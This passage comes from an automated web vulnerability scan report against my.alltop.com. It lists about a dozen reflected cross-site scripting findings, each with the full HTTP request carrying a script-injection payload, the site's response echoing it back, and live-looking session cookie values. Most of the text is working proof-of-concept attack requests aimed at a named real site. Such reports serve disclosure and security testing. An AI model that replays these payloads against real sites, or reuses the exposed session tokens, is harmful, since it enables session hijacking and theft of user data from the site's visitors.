Cookie: alltop_v=715bc9136ec18fde687f237cb61a1ab8; EPClientLogin=7ec7288512668ca75b58f5b1befbab70; myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Tue, 08 Mar 2011 20:51:05 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: EPClientLogin=7ec7288512668ca75b58f5b1befbab70; expires=Wed, 07-Mar-2012 20:51:05 GMT; path=/; domain=.alltop.com
Set-Cookie: myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; path=/; domain=.alltop.com
Expires: Tue, 08 Mar 2011 21:51:09 GMT
Cache-Control: private, max-age=10800, pre-check=10800
Last-Modified: Tue, 26 Oct 2010 18:16:32 GMT
Set-Cookie: alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID; expires=Mon, 06-Jun-2011 20:51:09 GMT; path=/; domain=.alltop.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 24630

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<h
...[SNIP]...
<form action="/alpha/i/%2522ns%253D%2522netsparker%25280x0001E2%2529)?2bb98"><script>alert(1)</script>dcc1bc07c78=1" method="post" accept-charset="utf-8">
...[SNIP]...

1.162. http://my.alltop.com/alpha/j [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://my.alltop.com
Path:   /alpha/j

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d0dab"><script>alert(1)</script>aa8fbb20ad8 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /alpha/jd0dab"><script>alert(1)</script>aa8fbb20ad8 HTTP/1.1
Referer: http://my.alltop.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: my.alltop.com
Cookie: alltop_v=715bc9136ec18fde687f237cb61a1ab8; EPClientLogin=7ec7288512668ca75b58f5b1befbab70; myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Tue, 08 Mar 2011 20:48:54 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: EPClientLogin=7ec7288512668ca75b58f5b1befbab70; expires=Wed, 07-Mar-2012 20:48:54 GMT; path=/; domain=.alltop.com
Set-Cookie: myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; path=/; domain=.alltop.com
Expires: Tue, 08 Mar 2011 21:48:55 GMT
Cache-Control: private, max-age=10800, pre-check=10800
Last-Modified: Tue, 26 Oct 2010 18:16:32 GMT
Set-Cookie: alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540; expires=Mon, 06-Jun-2011 20:48:55 GMT; path=/; domain=.alltop.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 24430

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<h
...[SNIP]...
<form action="/alpha/jd0dab"><script>alert(1)</script>aa8fbb20ad8" method="post" accept-charset="utf-8">
...[SNIP]...

1.163. http://my.alltop.com/alpha/j [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://my.alltop.com
Path:   /alpha/j

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ddccc"><script>alert(1)</script>605005c33ec was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /alpha/j?ddccc"><script>alert(1)</script>605005c33ec=1 HTTP/1.1
Referer: http://my.alltop.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: my.alltop.com
Cookie: alltop_v=715bc9136ec18fde687f237cb61a1ab8; EPClientLogin=7ec7288512668ca75b58f5b1befbab70; myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Tue, 08 Mar 2011 20:48:53 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: EPClientLogin=7ec7288512668ca75b58f5b1befbab70; expires=Wed, 07-Mar-2012 20:48:53 GMT; path=/; domain=.alltop.com
Set-Cookie: myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; path=/; domain=.alltop.com
Expires: Tue, 08 Mar 2011 21:48:54 GMT
Cache-Control: private, max-age=10800, pre-check=10800
Last-Modified: Tue, 26 Oct 2010 18:16:32 GMT
Set-Cookie: alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540; expires=Mon, 06-Jun-2011 20:48:54 GMT; path=/; domain=.alltop.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 24442

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<h
...[SNIP]...
<form action="/alpha/j?ddccc"><script>alert(1)</script>605005c33ec=1" method="post" accept-charset="utf-8">
...[SNIP]...

1.164. http://my.alltop.com/alpha/k [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://my.alltop.com
Path:   /alpha/k

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a3a51"><script>alert(1)</script>9c12012f8ff was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /alpha/ka3a51"><script>alert(1)</script>9c12012f8ff HTTP/1.1
Referer: http://my.alltop.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: my.alltop.com
Cookie: alltop_v=715bc9136ec18fde687f237cb61a1ab8; EPClientLogin=7ec7288512668ca75b58f5b1befbab70; myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Tue, 08 Mar 2011 20:48:59 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: EPClientLogin=7ec7288512668ca75b58f5b1befbab70; expires=Wed, 07-Mar-2012 20:48:59 GMT; path=/; domain=.alltop.com
Set-Cookie: myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; path=/; domain=.alltop.com
Expires: Tue, 08 Mar 2011 21:48:59 GMT
Cache-Control: private, max-age=10800, pre-check=10800
Last-Modified: Tue, 26 Oct 2010 18:16:32 GMT
Set-Cookie: alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540; expires=Mon, 06-Jun-2011 20:48:59 GMT; path=/; domain=.alltop.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 24430

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<h
...[SNIP]...
<form action="/alpha/ka3a51"><script>alert(1)</script>9c12012f8ff" method="post" accept-charset="utf-8">
...[SNIP]...

1.165. http://my.alltop.com/alpha/k [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://my.alltop.com
Path:   /alpha/k

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f2696"><script>alert(1)</script>291d523a08e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /alpha/k?f2696"><script>alert(1)</script>291d523a08e=1 HTTP/1.1
Referer: http://my.alltop.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: my.alltop.com
Cookie: alltop_v=715bc9136ec18fde687f237cb61a1ab8; EPClientLogin=7ec7288512668ca75b58f5b1befbab70; myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Tue, 08 Mar 2011 20:48:56 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: EPClientLogin=7ec7288512668ca75b58f5b1befbab70; expires=Wed, 07-Mar-2012 20:48:56 GMT; path=/; domain=.alltop.com
Set-Cookie: myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; path=/; domain=.alltop.com
Expires: Tue, 08 Mar 2011 21:48:57 GMT
Cache-Control: private, max-age=10800, pre-check=10800
Last-Modified: Tue, 26 Oct 2010 18:16:32 GMT
Set-Cookie: alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540; expires=Mon, 06-Jun-2011 20:48:57 GMT; path=/; domain=.alltop.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 24442

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<h
...[SNIP]...
<form action="/alpha/k?f2696"><script>alert(1)</script>291d523a08e=1" method="post" accept-charset="utf-8">
...[SNIP]...

1.166. http://my.alltop.com/alpha/l [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://my.alltop.com
Path:   /alpha/l

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1252c"><script>alert(1)</script>59089a52316 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /alpha/l1252c"><script>alert(1)</script>59089a52316 HTTP/1.1
Referer: http://my.alltop.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: my.alltop.com
Cookie: alltop_v=715bc9136ec18fde687f237cb61a1ab8; EPClientLogin=7ec7288512668ca75b58f5b1befbab70; myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Tue, 08 Mar 2011 20:48:54 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: EPClientLogin=7ec7288512668ca75b58f5b1befbab70; expires=Wed, 07-Mar-2012 20:48:54 GMT; path=/; domain=.alltop.com
Set-Cookie: myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; path=/; domain=.alltop.com
Expires: Tue, 08 Mar 2011 21:48:54 GMT
Cache-Control: private, max-age=10800, pre-check=10800
Last-Modified: Tue, 26 Oct 2010 18:16:32 GMT
Set-Cookie: alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540; expires=Mon, 06-Jun-2011 20:48:54 GMT; path=/; domain=.alltop.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 24430

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<h
...[SNIP]...
<form action="/alpha/l1252c"><script>alert(1)</script>59089a52316" method="post" accept-charset="utf-8">
...[SNIP]...

1.167. http://my.alltop.com/alpha/l [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://my.alltop.com
Path:   /alpha/l

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 27cd7"><script>alert(1)</script>be0c37c660d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /alpha/l?27cd7"><script>alert(1)</script>be0c37c660d=1 HTTP/1.1
Referer: http://my.alltop.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: my.alltop.com
Cookie: alltop_v=715bc9136ec18fde687f237cb61a1ab8; EPClientLogin=7ec7288512668ca75b58f5b1befbab70; myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Tue, 08 Mar 2011 20:48:51 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: EPClientLogin=7ec7288512668ca75b58f5b1befbab70; expires=Wed, 07-Mar-2012 20:48:51 GMT; path=/; domain=.alltop.com
Set-Cookie: myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; path=/; domain=.alltop.com
Expires: Tue, 08 Mar 2011 21:48:52 GMT
Cache-Control: private, max-age=10800, pre-check=10800
Last-Modified: Tue, 26 Oct 2010 18:16:32 GMT
Set-Cookie: alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540; expires=Mon, 06-Jun-2011 20:48:52 GMT; path=/; domain=.alltop.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 24442

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<h
...[SNIP]...
<form action="/alpha/l?27cd7"><script>alert(1)</script>be0c37c660d=1" method="post" accept-charset="utf-8">
...[SNIP]...

1.168. http://my.alltop.com/alpha/m [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://my.alltop.com
Path:   /alpha/m

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1244d"><script>alert(1)</script>a99132f65f8 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /alpha/m1244d"><script>alert(1)</script>a99132f65f8 HTTP/1.1
Referer: http://my.alltop.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: my.alltop.com
Cookie: alltop_v=715bc9136ec18fde687f237cb61a1ab8; EPClientLogin=7ec7288512668ca75b58f5b1befbab70; myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Tue, 08 Mar 2011 20:48:47 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: EPClientLogin=7ec7288512668ca75b58f5b1befbab70; expires=Wed, 07-Mar-2012 20:48:47 GMT; path=/; domain=.alltop.com
Set-Cookie: myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; path=/; domain=.alltop.com
Expires: Tue, 08 Mar 2011 21:48:47 GMT
Cache-Control: private, max-age=10800, pre-check=10800
Last-Modified: Tue, 26 Oct 2010 18:16:32 GMT
Set-Cookie: alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540; expires=Mon, 06-Jun-2011 20:48:47 GMT; path=/; domain=.alltop.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 24430

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<h
...[SNIP]...
<form action="/alpha/m1244d"><script>alert(1)</script>a99132f65f8" method="post" accept-charset="utf-8">
...[SNIP]...

1.169. http://my.alltop.com/alpha/n [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://my.alltop.com
Path:   /alpha/n

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 79b35"><script>alert(1)</script>f201995fd05 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /alpha/n79b35"><script>alert(1)</script>f201995fd05 HTTP/1.1
Referer: http://my.alltop.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: my.alltop.com
Cookie: alltop_v=715bc9136ec18fde687f237cb61a1ab8; EPClientLogin=7ec7288512668ca75b58f5b1befbab70; myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Tue, 08 Mar 2011 20:48:59 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: EPClientLogin=7ec7288512668ca75b58f5b1befbab70; expires=Wed, 07-Mar-2012 20:48:59 GMT; path=/; domain=.alltop.com
Set-Cookie: myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; path=/; domain=.alltop.com
Expires: Tue, 08 Mar 2011 21:48:59 GMT
Cache-Control: private, max-age=10800, pre-check=10800
Last-Modified: Tue, 26 Oct 2010 18:16:32 GMT
Set-Cookie: alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540; expires=Mon, 06-Jun-2011 20:48:59 GMT; path=/; domain=.alltop.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 24430

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<h
...[SNIP]...
<form action="/alpha/n79b35"><script>alert(1)</script>f201995fd05" method="post" accept-charset="utf-8">
...[SNIP]...

1.170. http://my.alltop.com/alpha/n [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://my.alltop.com
Path:   /alpha/n

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dd04a"><script>alert(1)</script>b03f8355e2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /alpha/n?dd04a"><script>alert(1)</script>b03f8355e2=1 HTTP/1.1
Referer: http://my.alltop.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: my.alltop.com
Cookie: alltop_v=715bc9136ec18fde687f237cb61a1ab8; EPClientLogin=7ec7288512668ca75b58f5b1befbab70; myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Tue, 08 Mar 2011 20:48:58 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: EPClientLogin=7ec7288512668ca75b58f5b1befbab70; expires=Wed, 07-Mar-2012 20:48:58 GMT; path=/; domain=.alltop.com
Set-Cookie: myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; path=/; domain=.alltop.com
Expires: Tue, 08 Mar 2011 21:48:58 GMT
Cache-Control: private, max-age=10800, pre-check=10800
Last-Modified: Tue, 26 Oct 2010 18:16:32 GMT
Set-Cookie: alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540; expires=Mon, 06-Jun-2011 20:48:58 GMT; path=/; domain=.alltop.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 24438

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<h
...[SNIP]...
<form action="/alpha/n?dd04a"><script>alert(1)</script>b03f8355e2=1" method="post" accept-charset="utf-8">
...[SNIP]...

1.171. http://my.alltop.com/alpha/o ['"--> parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://my.alltop.com
Path:   /alpha/o

Issue detail

The value of the '"--></style></script><script>netsparker(0x0001DB)</script> request parameter is copied into the HTML document as plain text between tags. The payload 35250<script>alert(1)</script>e877022706a was submitted in the '"--></style></script><script>netsparker(0x0001DB)</script> parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /alpha/o?'"--></style></script><script>netsparker(0x0001DB)</script>35250<script>alert(1)</script>e877022706a HTTP/1.1
Referer: http://my.alltop.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: my.alltop.com
Cookie: alltop_v=715bc9136ec18fde687f237cb61a1ab8; EPClientLogin=7ec7288512668ca75b58f5b1befbab70; myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Tue, 08 Mar 2011 20:50:58 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: EPClientLogin=7ec7288512668ca75b58f5b1befbab70; expires=Wed, 07-Mar-2012 20:50:58 GMT; path=/; domain=.alltop.com
Set-Cookie: myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; path=/; domain=.alltop.com
Expires: Tue, 08 Mar 2011 21:50:59 GMT
Cache-Control: private, max-age=10800, pre-check=10800
Last-Modified: Tue, 26 Oct 2010 18:16:32 GMT
Set-Cookie: alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID; expires=Mon, 06-Jun-2011 20:50:59 GMT; path=/; domain=.alltop.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 24662

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<h
...[SNIP]...
</script>35250<script>alert(1)</script>e877022706a" method="post" accept-charset="utf-8">
...[SNIP]...

1.172. http://my.alltop.com/alpha/o [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://my.alltop.com
Path:   /alpha/o

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cdf0b"><script>alert(1)</script>36bf91129c1 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /alpha/ocdf0b"><script>alert(1)</script>36bf91129c1 HTTP/1.1
Referer: http://my.alltop.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: my.alltop.com
Cookie: alltop_v=715bc9136ec18fde687f237cb61a1ab8; EPClientLogin=7ec7288512668ca75b58f5b1befbab70; myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Tue, 08 Mar 2011 20:49:13 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: EPClientLogin=7ec7288512668ca75b58f5b1befbab70; expires=Wed, 07-Mar-2012 20:49:13 GMT; path=/; domain=.alltop.com
Set-Cookie: myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; path=/; domain=.alltop.com
Expires: Tue, 08 Mar 2011 21:49:16 GMT
Cache-Control: private, max-age=10800, pre-check=10800
Last-Modified: Tue, 26 Oct 2010 18:16:32 GMT
Set-Cookie: alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540; expires=Mon, 06-Jun-2011 20:49:16 GMT; path=/; domain=.alltop.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 24430

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<h
...[SNIP]...
<form action="/alpha/ocdf0b"><script>alert(1)</script>36bf91129c1" method="post" accept-charset="utf-8">
...[SNIP]...

